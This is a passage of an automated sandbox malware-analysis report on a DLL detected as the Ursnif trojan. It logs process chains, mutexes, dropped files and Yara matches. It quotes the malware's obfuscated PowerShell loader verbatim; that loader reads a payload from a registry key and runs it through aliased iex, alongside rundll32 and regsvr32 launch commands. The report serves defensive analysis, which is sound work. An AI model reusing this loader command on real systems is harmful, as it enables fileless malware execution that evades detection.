            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
            Source: classification engineClassification label: mal100.troj.evad.winDLL@59/52@16/4
            Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F13309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{542DFF7D-A3B8-A645-CDC8-873A517CAB0E}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B0E37361-4FA3-62B8-59E4-F3B69D58D74A}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
            Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{80FA9EC6-DFAB-B287-69B4-8306AD28679A}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{EC2366C9-5BCE-FEAF-45E0-BF1249146366}
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: 6.dllStatic file information: File size 1781920 > 1048576
            Source: 6.dllStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1B073 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1E97E pushad ; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1AD40 push ecx; ret
            Source: 6.dllStatic PE information: real checksum: 0x1ba6ec should be: 0x1b8278
            Source: nigogz4l.dll.33.drStatic PE information: real checksum: 0x0 should be: 0xee8b
            Source: dtnsoflb.dll.43.drStatic PE information: real checksum: 0x0 should be: 0x4b02
            Source: nlbomp32.dll.35.drStatic PE information: real checksum: 0x0 should be: 0xf45d
            Source: uu5u2nmv.dll.40.drStatic PE information: real checksum: 0x0 should be: 0xa363
            Source: wklr4juq.dll.36.drStatic PE information: real checksum: 0x0 should be: 0x1029d
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
